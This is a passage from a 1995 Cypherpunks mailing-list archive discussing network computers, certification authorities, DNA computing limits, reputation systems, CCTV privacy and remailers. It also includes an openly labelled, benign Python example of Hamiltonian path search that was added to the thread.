'upgrading' to netscape 2.x,etc.... 
There is (currently?) very little, the only thing interesting I found
is that 'they' claim to give away free CA if you mail at
<ca@secret.org> (their 'Project7'/'666 Crypto' route...)

Regards

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Marxist SEAL Team 6 jihad break mururoa explosion smuggle




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 28 Nov 1995 12:15:35 +0800
To: cypherpunks@toad.com
Subject: Re: The future will be easy to use (fwd)
Message-ID: <199511280309.WAA10578@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by ravage@einstein.ssz.com (Jim Choate) on 
Mon, 27 Nov  8:54 PM


>Don't hold your breath. The current market surveys say 
>that there is no market for them. Check out this week's 
>PC Week or Mac Week, as they both have several 
>articles discussing this. Bottom line is that the under 
>$1000  computer seems to have no future either in 
>industry or the home.


Peter Lewis reports in today's NYT on "doubts about the fantasy 
of a $500 'Network PC' " but quotes Eric Schmidt of Sun saying, 
"They will exist and they will be very successful, and not just 
from Sun and Oracle. The price points are going to be pretty 
low, and they'll look more like consumer electronics."


Anybody want this mixed review send us a BOX_top.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Tue, 28 Nov 1995 14:31:04 +0800
To: cypherpunks@toad.com
Subject: Re: The future will be easy to use (fwd)
Message-ID: <v01530506ace05744708d@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


>> One thing that David didn't mention is security add-ons to the "network
>> computers" that are supposed to be rolled out within the next few months --
>> the successors to X terminals, $500 boxes with a good screen/sound,
>> cheap cpu, and a few megs of ram and flash memory to hold a web browser.
>> I expect some folks to make a good living by writing add-ons (including
>> crypto add-ons) to these gizmos.
>>
>
>Don't hold your breath. The current market surveys say that there is no
>market for them. Check out this week's PC Week or Mac Week, as they both
>have several articles discussing this. Bottom line is that the under $1000
>computer seems to have no future either in industry or the home.
>
>Realistically, who in their right mind would buy a diskless workstation to
>connect to Internet? You certainly wouldn't do crypto on it because it has
>to boot from somewhere else and this leaves all kinds of security holes.
>Also, there is the fact that at the current time there are no generally
>usable apps on Internet beyond the web and most companies would rather have
>their employees doing something more productive than hanging ten.
>
>Anyone who bases their business on this technology won't have a business.

The same sort of things could be said of the telephone compared with
written correspondence. Why would anyone have one in their business or
home? Anyone can overhear a conversation, people will just chat, the only
thing you can do with it is talk, there is no record of the correspondence,
why would anyone want to talk to people on the other side of town? etc.

Think telephone, not computer. Think people over 40 who want a
communication tool with zero maintenance and zero learning curve.


-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
+1 415 390 9732                    |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jordan Hayes <jordan@Thinkbank.COM>
Date: Tue, 28 Nov 1995 14:36:51 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Terminals
Message-ID: <199511280620.WAA25319@Thinkbank.COM>
MIME-Version: 1.0
Content-Type: text/plain


	From mclow@owl.csusm.edu Mon Nov 27 20:07:37 1995

	Would you write and send e-mail if you had no way of
	archiving it?

This is what AOL is.

	Would you use "net-quicken", if it required all your data
	to be stored on a shared disk at Intuit?

Who are you kidding?  All your banking information is stored *at
your bank* today; how is that any different?

OBCrypto: none.

/jordan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mp@moonmac.com (Michael Pearce)
Date: Tue, 28 Nov 1995 14:53:20 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re:ETH_ic?
Message-ID: <v02120d04ace02917b7e4@[204.119.62.251]>
MIME-Version: 1.0
Content-Type: text/plain


Nb5s $bp2s writes,

>>      ...the case has killed the hacker ethic. "If I saw someone
>>      on the Internet with a security weakness, at this point
>>      I would be reluctant to act the Good Samaritan and
>>      report it," said Jeffrey Kegler, an independent software
>>      consultant in Sunnyvale Calif. "If I saw weakness in
>>      Intel's machine, I'd keep it to myself."

If I saw a weakness in Intel's machine I would happily inform the company
in the safest way possible: posting it to Cypherpunks,
alt.destroy.microsoft, comp.sys.intel and any other appropriate newsgroup,
via anonymous server. I'm sure the information would wind up in the correct
hands _eventually_.

Not that I'm suggesting anything, of course.

|^^^^^^Please don't add "*@aol.com" to your twit filter. Thank you.^^^^^^|
|          mklprc@aol.com          |   "Give them a light and they'll    |
|          mp@moonmac.com         <*>       follow it anywhere!"         |
| http://www.teleport.com/~mklprc/ |               -- Firesign Theater   |
|   No Microsoft products were used in the production of this message.   |
\----smuggle FSF terrorist BATF (fnord) FBI nuclear Saddam PGP Clinton---/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 28 Nov 1995 12:59:42 +0800
To: cypherpunks@toad.com
Subject: Inexpensive Crypto Boxes...
Message-ID: <199511280454.WAA00361@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi all,

The recent discussion on the <$1000 computer/appliance/digital-widget got me
to thinking and I had a spasm...

The new Sony Play Station is operating under a stripped down Unix.
Considering the speed that these boxes are designed to run at it seems a
natural for somebody to come up with a crypto workbench on ROM to install in
one of these babies. Could program one of the game controller ports as a
serial port and hook it to a Linux box (for example).

Ta ta





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 28 Nov 1995 14:07:06 +0800
To: cypherpunks@toad.com
Subject: Re: Directed Hamiltonian Path Problem
Message-ID: <acdfe4a7010210043794@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:04 AM 11/28/95, Thaddeus J. Beier wrote:
>>  I am curious on whether there are any applications of the directed
>> Hamiltonian path problem to cryptography, zero-knowledge proofs, etcetera. My
>> reason for asking is that I've come across something in my field (molecular
>> genetics) that can be used to solve such problems in a couple of weeks or so.
>>  -Allen
>>
>>
>Secret sharing can be done by Hamiltonian paths.  No public key code has been
>found to take advantage of those, or any other NP complete problem, so far as
>I know.  DNA computing really doesn't solve the Hamiltonian graph problem, it
>just makes the biggest one that you can solve a little bit bigger.  500 point
>graphs remain insoluble (pun unintended) for earth-sized vats of DNA.
>
>Really.

Thaddeus beat me to the punch, as I was going to say just about the same thing.

The work by Adleman on "vats of computers" is intriguing, but is no real
solution to the problem of exponential or superexponential growth: a
problem that Adleman's vat could solve with a fish tank full of DNA
computers in a day could be easily outpaced by a key length "only" a bit
longer.

Check the archives for many articles on this topic. Also, check the Web
search engines for conferences, papers, etc. on this.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 28 Nov 1995 15:48:27 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: Inexpensive Crypto Boxes...
In-Reply-To: <199511280454.WAA00361@einstein.ssz.com>
Message-ID: <Pine.SOL.3.91.951127231345.28726A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 27 Nov 1995, Jim Choate wrote:
> 
> The new Sony Play Station is operating under a stripped down Unix.
> Considering the speed that these boxes are designed to run at it seems a
> natural for somebody to come up with a crypto workbench on ROM to install in
> one of these babies. Could program one of the game controller ports as a
> serial port and hook it to a Linux box (for example).

We've had this discussion sort of before, but not involving consoles yet, 
so I'll throw in my 2p. 

It isn't likely to be worth doing this with a sony play-station; its DSP
capabilities are nothing special, and you're paying way too much for
irrelevant stuff like CD-ROMs, 3D accelerators, etc. For the same money
you could get a load of 56Ks or some of the TI chips. If you must
cannibalise a game system, you'd be better off using either a Sega Saturn
(more general purpose CPU power), or mayhaps ripping apart an Atari
Jaguar, which has some nice custom DSP hardware, with a big fat bus to 
play with. It'd still be more of a stupid pet trick than a real solution, 
but definitely a neat hack.

Non-crypto.

BTW, I wouldn't be surprised if we do get to see some sort of Internet 
software for the next generation consoles. I remember getting a pretty 
good spit-take out of some of the NCSA guys at the WWW-WW in 93 when I 
mentioned AT&T were bringing out a modem for the sega genesis, and we 
were thinking about getting a dev kit and taking a shot at 'Sonic the 
Webhog' (turned out to be impractical - bit rate was too low, dev kits 
too expensive). With the new systems, the dynamics have changed (nvram in 
the machines, faster comms, more memory and CPU).

I still think that the idea of selling dickless workstations for the home 
is perhaps not the best response to rapidly falling disk prices; however, 
if you raise the price by $100, and use that money to add a 500Mb/1Gb 
hard drive, the whole thing becomes a lot more interesting - that's enough 
storage to keep your locally created data around (unlikely to exceed 
100Mb), whilst using the rest as a cache for stuff that really lives on 
the network. If I had any shirts worth betting I wouldn't put them on 
this concept, but it might be interesting.

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: torrejr@pcnet.com
Date: Tue, 28 Nov 1995 13:32:06 +0800
To: Robert Hettinga <cypherpunks@toad.com
Subject: Re: Cypherpunk Certification Authority
Message-ID: <Chameleon.951128011153.torrejr@>
MIME-Version: 1.0
Content-Type: text/plain



So far, everybody on the net has discussed the fun part(s) of the CA issue. 

The techies talk about protocol, encryption ... in short the real FUN stuff. I have enjoyed diverging 
opinions of some of the participants. Many make excellent points and have taught me more than I 
ever dreamed to learn.

Lawyers are already making money and preparing for the future :-) Some lawyers argue about 
liabilities and drool over new laws being proposed all over the country by other lawyers to 
guarantee future lawsuits. Another lawyer does not believe CAs are an option and makes a good 
buck selling books to prove it (Electronic Commerce Law-Ben Wright squire) another publishes 
the American Bar Association CA liabilities, names it draft of the digital signature
guidelines and goes to work for Verisign (CA?  DS? UH?).

I can keep talking about good stuff that has happened in the last few months for about everyone 
interested in the last frontier (the electronic one) and its trading posts (electronic commerce), but 
the fact is that there are no CAs in full production yet. Yeah! Verisign is around .... Santa Clara. Of 
course I have other choices (Did I say great choices?)  like Cost in Sweden and at one time 
EuroCert in England was advertising on the net. 

I have been asking myself ... WHY? I can't accept the standard response: Fear of liability! Granted 
that the liability factor is important but my gut feeling tells me that's not the whole story. The 
hardware and the software is out there (I haven't commented on the quality of this stuff!). I thought 
that several companies who have indicated interest have all it takes to make a successful CA but 
nobody seems to move reasonably fast.

Is it possible that the process of issuing and maintaining a certificate is so complex and expensive? I 
think that MITRE did a study for NIST and they came up with a cost of $800 per year per federal 
employee to maintain and administer a Federal CA.  

Any suggestion?

PS I want to thank Robert Hettinga for his excellent work promoting the principles of the 
Cypherpunks, and for disseminating critical information that helps shape the corporate world for a 
better electronic future. 
-------------------------------------
Juan Rodriguez i Torrent
torrejr@pcnet.com
11/27/95  23:54:24
-------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Tue, 28 Nov 1995 16:32:30 +0800
To: cypherpunks@toad.com
Subject: No Privacy Right in UK ? - Part 2
Message-ID: <Pine.BSD.3.91.951128000018.20981B-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
Friend, 
 
 
11 27 95 Press Association News in the UK reports: 
 
   STORM AS SPY CAMERA `JUICY BITS' SET FOR SALE 
 
 
"Furious MPs are demanding action," cries the story.  Why? 
 
   Their anger follows a row over the sale in video shops of 
   "juicy bits" from closed circuit TV cameras fixed in high 
   streets and stores to detect crime. 
 
 
High streets: where the fashionable retail shops are. 
 
   One extract showed a couple having sex in a doorway, 
   unaware they were being watched. 
 
 
It wasn't me, Mums, I swear! 
 
A Liberal Democrat family spokeswoman: 
 
   "That this sale has been allowed is a disgrace and will 
   undermine the trust the public has in cameras designed 
   to cut crime." 
 
 
A Labour MP: 
 
   "This situation plainly leaves people wide open to black- 
   mail." 
 
 
He said "some of his constituents in Linlithgow had recently
been compromised by such a video." 
 
A sly dog at the Home Office: 
 
   "We have not seen the video [good move!], but judging from 
   what has been said about it, it would have to be classified 
   by the British Board of Film Classification if it is being sold." 
 
 
If we don't have privacy, we do have censorship! 
 
But Mums, I swear... 
 
 
Cordially, 
 
Jim 
 
 
 
NOTE.  The Press Association website's URL: 
 
             http://www.pa.press.net 
 
       The newsstory's online filename: pick8.html. 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 28 Nov 1995 19:39:39 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Directed Hamiltonian Path Problem
In-Reply-To: <acdfe4a7010210043794@[205.199.118.202]>
Message-ID: <199511280616.BAA11852@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> The work by Adleman on "vats of computers" is intriguing, but is no real
> solution to the problem of exponential or superexponential growth: a
> problem that Adleman's vat could solve with a fish tank full of DNA
> computers in a day could be easily outpaced by a key length "only" a bit
> longer.

Indeed. It's the problem with innumeracy. People don't understand that
if, say, a problem is O(2^N), and a problem of size 1000 requires a
liter of fluid, a problem of size 2000 requires 
107150860718626732094842504906000181056140481170553360744375038837035\
105112493612249319837881569585812759467291755314682518714528569231404\
359845775746985748039345677748242309854210746050623711418779541821530\
464749835819412673987675591655439460770629145711964776865421676604298\
31652624386837205668069376 liters of fluid.

I'll note that is something like
107150860718626732094842504906000181056140481170553360744375038837035\
105112493612249319837881569585812759467291755314682518714528569231404\
3598457757469857480393456777482423098542107460506237114187795418
times more liters of fluid than there are fundamental particles in the
universe -- being too lazy to calculate the number of fundamental
particles in a liter, I won't make the more relevant statement of what
multiple of the number of particles in the universe the number of
particles in that number of liters of fluid would be.

The stuff on quantum factoring worries me more than Adleman fluid -- I
never can get an explanation of it clear enough to decide if it is
more than a theoretical concern.

Perry
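
Added example, not part of any message in this thread: an exact directed Hamiltonian path search (bitmask dynamic programming) that counts the states it has to track, plus the 2^N scaling arithmetic from the message above. The sample graph, function names and the "litres" helper are constructed for illustration and are not Adleman's actual instance or method.

```python
"""Directed Hamiltonian path: exact search and how its cost grows (added example)."""

# Constructed 7-vertex directed graph; the only Hamiltonian path from 0 to 6
# is 0-1-2-3-4-5-6.
SAMPLE_EDGES = [(0, 1), (0, 3), (0, 6), (1, 2), (1, 3), (2, 1), (2, 3),
                (3, 2), (3, 4), (4, 1), (4, 5), (5, 2), (5, 6)]
# Same graph with vertex 4 made unreachable, so no Hamiltonian path exists.
NO_PATH_EDGES = [e for e in SAMPLE_EDGES if e != (3, 4)]


def find_hamiltonian_path(n, edges, start, end):
    """Return (path or None, number of DP states examined).

    A state is (visited-set bitmask, last vertex). Every state reachable from
    `start` is generated layer by layer, one extra vertex per layer.
    """
    succ = [[] for _ in range(n)]
    for u, v in edges:
        succ[u].append(v)

    full = (1 << n) - 1
    parent = {(1 << start, start): None}   # state -> previous vertex
    frontier = [(1 << start, start)]
    while frontier:
        next_frontier = []
        for mask, u in frontier:
            for v in succ[u]:
                if mask & (1 << v):        # already visited on this path
                    continue
                state = (mask | (1 << v), v)
                if state not in parent:
                    parent[state] = u
                    next_frontier.append(state)
        frontier = next_frontier

    states = len(parent)
    if (full, end) not in parent:
        return None, states

    # Walk the parent links backwards to rebuild one witness path.
    path, mask, v = [], full, end
    while v is not None:
        path.append(v)
        prev = parent[(mask, v)]
        mask &= ~(1 << v)
        v = prev
    return path[::-1], states


def is_hamiltonian_path(n, edges, path, start, end):
    """Independent check of a claimed path (verifying is cheap, finding is not)."""
    edge_set = set(edges)
    return (path is not None
            and path[0] == start and path[-1] == end
            and sorted(path) == list(range(n))
            and all((a, b) in edge_set for a, b in zip(path, path[1:])))


def worst_case_states(n):
    """States examined on the complete digraph: 1 + (n-1) * 2**(n-2)."""
    edges = [(u, v) for u in range(n) for v in range(n) if u != v]
    return find_hamiltonian_path(n, edges, 0, n - 1)[1]


def litres_needed(base_size, base_litres, size):
    """Scaling under the O(2^N) assumption used in the message above."""
    return base_litres * 2 ** (size - base_size)


if __name__ == "__main__":
    path, states = find_hamiltonian_path(7, SAMPLE_EDGES, 0, 6)
    print("path:", path, "states examined:", states)
    print("no-path graph:", find_hamiltonian_path(7, NO_PATH_EDGES, 0, 6)[0])
    for n in (8, 12, 16):
        print(n, "vertices, complete digraph:", worst_case_states(n), "states")
    print("digits in litres for size 2000:",
          len(str(litres_needed(1000, 1, 2000))))
```

Each added vertex roughly doubles the state count, which is the growth the thread says a larger vat cannot keep up with.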




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 28 Nov 1995 16:38:51 +0800
To: cypherpunks@toad.com
Subject: Diskless "Eunuchs" Machines Likely to Fail
Message-ID: <ace0059603021004f459@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:17 AM 11/28/95, Steven Weller wrote:

>The same sort of things could be said of the telephone compared with
>written correspondence. Why would anyone have one in their business or
>home? Anyone can overhear a conversation, people will just chat, the only
>thing you can do with it is talk, there is no record of the correspondence,
>why would anyone want to talk to people on the other side of town? etc.
>
>Think telephone, not computer. Think people over 40 who want a
>communication tool with zero maintenance and zero learning curve.

I'm skeptical of the "Diskless Internet Box = Telephone" analogy.

Folks I know who are not computer-savvy, or who have other things they'd
rather be doing, are not likely, as I see it, to buy boxes that still
require them to type messages to other people but that don't allow them to
download and save the interesting stuff they find.

The telephone appealed to those who truly wanted to "just keep
talking"...that was the beauty of it. Most people don't know how to
touch-type, and typing by hunting-and-pecking is painful and unnatural for
most people.

A couple of years ago "the computer for the rest of us" was said to be a
pen-based Newton-type machine, now it is said to be a diskless,
memory-limited "Eunuchs" machine.

(The diskless--and disketteless--systems I've seen described recently would
make it impossible for me to interact as I currently do. To be sure, maybe
"data storage services" will spring up to temporarily store stuff one has
snarfed, but the download to one's home terminal still must be done again.
Faster modems, and cable modems, will change things somewhat, but then this
is a huge change in a lot of ways, in any case. Even the stereotypical
"chatters" at AOL are heavy users of local storage: witness the massive
number of "me too!" posts from AOLers whenever a nude GIF or JPEG of Sandra
Bullock or Jennifer Aniston is mentioned...they clearly are downloading a
lot of images and whatnot to home machines...that measly 4 MB of flash
memory is going to get filled up mighty fast.)

By the way, Intel builds a lot of the motherboards for use by various
companies. Someone at Intel claimed recently that even if the CPU was
completely free (as some 486s effectively are already), Intel could not see
how a system could be consistently built for under $500, including monitor,
small disk, memory, etc.

(The Oracle folks are muttering about a Newton-like OS which would load
objects or applets or whatever in a more efficient way...this might work,
but I'm still skeptical that users' needs can be met. Those folks wanting
local access to the JPEGs of Sandra Bullock will still be out of luck....)

I see a greater chance that home game machines, such as the 3DO and Sony
PlayStation machines will get Web browsers done for them than I do that
people will buy machines that are so limited.

The only relevance of this whole topic to Cypherpunks is....is....minimal.

--Tim May, who plans to find a way to use this boondoggle idea by Oracle to
make money. (Right now I'm long Oracle, but this may soon change.)

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Tue, 28 Nov 1995 20:02:03 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: towards a theory of reputation
In-Reply-To: <Pine.SUN.3.91.951122095930.22711D-100000@viper.law.miami.edu>
Message-ID: <Pine.SUN.3.91.951128012308.9094C-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 Nov 1995, Michael Froomkin wrote:

> This discussion puzzles me.  I thought we were bombarded with 
> reputational goods all the time:  brand names, stocks (what is a purchase 
> in the 2ndary market but a purchase of reputation most of the time?), 
> degrees from famous universities.  Anonymity complicates matters only if 
> no systems of unique ID is used.  Throw in digital signatures and we are 
> back at brand names, aren't we?

It's true that we deal routinely with reputations now.
However there is very little formal analysis of reputation as a concept.  
Although our common sense knowledge of reputations seems to serve 
us fairly well(*), there is no guarantee that it will scale well to an 
anonymous market where both the number of participants and the importance 
of reputation are much higher.

* However, the government apparently doesn't think so.  Witness the FDA and 
the SEC.

We need to have formal algorithms to deal with reputations, and we need 
to be able to show that they have desirable properties.  This will reduce 
transaction costs and help bring anonymous markets into the mainstream.  
Perhaps more importantly, good reputation algorithms will make 
agorics computing possible.  There is a very interesting proposal for a 
network routing system based on microcurrency and positive reputations 
(see http://www.webcom.com/agorics/dsr.html).  However it does not say 
what algorithms will be used to handle reputations.  If the system is 
actually implemented, its proper functioning will depend as much on the 
properties of the reputation algorithms used as on the correctness of its 
protocols.

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 28 Nov 1995 19:54:06 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Certification Authority
Message-ID: <199511281032.CAA21495@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 26 Nov 1995, Perry E. Metzger wrote:


> Someone spoofing Alice, who is either Detweiler or "Dr." Cohen, says:
> > I have never signed any of my posts to this mailing list and frankly have
> > no intention of beginning at this point.
> 
> Well, signed Alice posts have shown up, so we will just have to assume
> that the above was a spoof and that the signed Alice posts are the
> real ones, now won't we?

Perry.  Normally I try my best to ignore you.

But I will simply repeat, I have never signed a post, and have no 
intention of beginning to sign any posts, until I establish a secure 
machine in a secure complex that is dedicated to that purpose.

I like to think that I take my security somewhat seriously.

And I would ask whoever DID post the PGP key under my name, to please
issue a revocation certificate. 

> Perry

Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 28 Nov 1995 09:57:15 +0800
To: cypherpunks@toad.com
Subject: Cray's New T3E
Message-ID: <199511280140.CAA25757@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



WSJ, Nov 27, 1995

Cray Research to Unveil 2nd-Generation Parallel Processor
for Technical Market

By William M. Bulkley

Cray Research Inc., bidding to reassert its dominance of
high-end scientific supercomputing, is expected to unveil
tomorrow a new parallel-processing supercomputer with
unprecedented speed.

The Eagan, Minn., computer maker has been best-known for
its multimillion-dollar vector supercomputers that use
just a few very powerful processors. The new Cray T3E
will be its second-generation parallel processor. Unlike
its predecessor the T3D, it operates without being
connected to a traditional vector supercomputer.

People familiar with the machine say it will have a
theoretical top speed of more than one trillion
operations a second, or one teraflops, a measure of
supercomputer speed. Currently the only planned teraflops
machine is one that Intel Corp. is building for the
Energy Department's Sandia National Laboratories.

'Back in the Game'

"We look at this as evidence of Cray reasserting its
franchise in the technical computing market," said Debra
Goldfarb, who follows supercomputers for International
Data Corp., a market research firm in Framingham, Mass.
"Cray's back in the game."

The smallest models are likely to be priced at well under
$1 million. Buyers will be able to increase power by
adding just a few processors at a time in the future
making the systems "highly scalable" in industry
parlance. The T3E can be built with as few as 16
processors or as many as 2,048 processors.

"This reconfirms Cray's capabilities to build very
efficient high-performance computers," said Philip
Samper, chairman and chief executive officer, who was
hired last spring. Cray has said it will report a net
loss for the current year, reflecting restructuring
charges as Mr. Samper cuts costs, and sales are weak as
customers have been waiting for new generations of both
Cray's T90 vector supercomputers and the T3E. Mr. Samper
said that Cray will be profitable in the current fourth
quarter on an operating basis before an expected
restructuring charge, and "We expect to be profitable in
1996. That's very important for this company."

Mr. Samper, who declined to discuss details of the T3E,
said in an interview, "We have $100 million in orders
already in house. When customers get so excited they put
money on the line, that's the ultimate test." The T3E
won't be available for sale until the end of the first
quarter of 1996. Cray's total backlog was $355 million at
the end of the third quarter, including orders for the
T3E.

Cray, the longtime leader in scientific supercomputing,
faced challenges from a host of smaller companies in the
late 1980s as well as three big Japanese computer makers.
But with the end of the Cold War, military need for
supercomputers diminished, Cray's sales plateaued and
several of the smaller companies went out of business.

Offsetting Some Declines

Analysts estimate the high-performance-computer market at
about $3 billion a year, with growth in commercial
markets for large databases and video-servers for
interactive-media, offsetting declines in government
business. International Business Machines Corp. and
Silicon Graphics Inc. have both grown rapidly by selling
parallel-processing systems in those markets.

Cray sells small commercial supercomputers and commercial
servers for computer networks of Sun Microsystems Inc.
workstations. However, analysts say it needs revenue from
the high-performance scientific market to rebound. Jay P.
Stevens, an analyst with Dean Witter, says sales in the
current year will fall 27% to $615 million from $921.6
million. Next year he forecasts a 20% rise to $808
million. Mr. Stevens predicts a net loss before charges
for 1995 of $73 million, or $1.25 a share, compared with
net income of $55.7 million, or $2.32 a share, in 1994.

Mr. Samper said that during the year, Cray has reduced
research-and-development spending by 16% and lowered
overheads. He said it plans to buy more parts from
outside suppliers, and is also controlling costs by
negotiating with government agencies to have them pick up
certain research and support costs.

-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Tue, 28 Nov 1995 20:26:03 +0800
To: Dan Harmon <harmon@tenet.edu>
Subject: Re: [NOISE] Chi Sun Times SS# Sweepstakes
Message-ID: <v02130500ace045aa0b50@[165.254.158.230]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:12 11/27/95, Dan Harmon wrote:

>One reason for the ssn's is that it may be a LEA sponsored promo. If you are
>dumb enough to have a warrant or some other judgement against you and you
>give your ssn and address to a person or entity that you don't know then
>shame on you.


This reminds me of an incident that occurred in California last year. A
number of people received a notice that they had just won an
all-expenses-paid trip. Most of them turned up to get their gift only to
then discover that it was a Government Sting Operation and that the trip
was to Jail (they were all wanted on outstanding warrants which were
waiting for them when they arrived at the meeting site).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Tue, 28 Nov 1995 01:39:42 +0800
To: Jyri Kaljundi <jk@digit.ee>
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <Pine.SOL.3.91.951127180832.25120B-100000@sun.digit.ee>
Message-ID: <Pine.SOL.3.91.951128030744.19145A-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 27 Nov 1995, Jyri Kaljundi wrote:
> What software there is available (preferably non-commercial) to become a 
> CA? Is for example the SSLeay package enough?

I'm just making a quick comment on this point.  The current SSLeay setup, 
I would say no.  You can do it but you need to write more stuff to do it 
correctly.  It is a bit of an evil kludge.

The next version should be able to do this (I hope, depending on time).
The next version has (will have) several different ways to 'retrieve'
certificates which can be added via a run time API (the application can
'push' new methods into the library during startup). I will probably not
have time to put in a 'socket' based certificate server but it should be
simple enough for this to be written by other people. It should also be
simple enough for other people to write some routines that conform to the
API so that the netscape DB files can be accessed by SSLeay (along with
the current SSLeay 'hash directories' and the socket based lookup (if it
gets put in)). 

The most important change is that I will support CRL if they are 
present and probably generate a 'warning' if there is no CRL.  I still 
need to write a simple application to do a basic 'keep track of issued 
certificates' and generate a CRL if required.  The library routines to 
write a CA are present, they just need to be glued to a simple database 
(which I will probably do in my demo case via ascii files in directories).

This version will also hopefully support the concept of selecting a 
certificate/private key from a set of certificates, attempting to pick a 
certificate that is in the same 'tree' as another certificate.

This concept of multiple certificates for a person is useful for
SSLtelnet, so that each 'host domain' can issue its own certificates (and
keep track of its own CRL).  To let someone login, just issue them with
a 'certificate' for that 'host domain'. 

eric
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Tue, 28 Nov 1995 20:43:04 +0800
To: cypherpunks@toad.com
Subject: Re: bit quiet in here lately
Message-ID: <199511281234.EAA17790@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 24 Nov 1995, David K. Merriman wrote:

> At 02:11 AM 11/24/95 -0500, futplex wrote:
> >sameer writes:
> >> 	I am working on a spec which myself and others will turn into
> >> an internet draft, for placements on the standards track.  It will
> >> standardize remailer commands and nymserver commands, and will
> >> incorporate payment. Once we get a draft written up it will be posted
> >> for review, flames, and criticism.

      [snip to save bandwidth]

> Now, if the remailer service-listing operators could agree on a standard
> format for their reporting (lag time, feature lists, etc), then it would
> simplify maintaining a list of remailers - which would increase the
> usability of the remailer system, and help the use and growth of remailers.

The remailer operators can't even agree on a standard header syntax.  Some
support one header to request remailing, while others support another. 

I remember some time ago, that I was using a non-compliant (i.e. unique)
remailer located in Berkeley.  I was trying to post some information that
would have helped to expedite the FDA approved study on medicinal
marijuana. 

The article detailed that Health & Welfare Canada was growing a bumper
high-potency crop to help teach the Edmonton city police about the wicked 
weed.  Especially, cultivation techniques.

I thought that this might be "helpful" to the medicinal marijuana study. 
I thought that since the Canadian Government was granting licenses to
help law enforcement, that they might not be opposed to studying its
possible health benefits as well. 

(Canada's government funded health care system, could use some cost saving
measures.  If there is something useful there, it could help redirect
funding, and indirectly ameliorate the current waiting lists and service
cuts for all Canadians.)

I thought that the study organizers in the United States, MAPS I believe
 -- the ones who had complied with all US laws and regulations and permits
and headed up by a guy named, Rick Doblin, a fellow who's apparently
writing a thesis on Public Policy at the Kennedy School of Government at
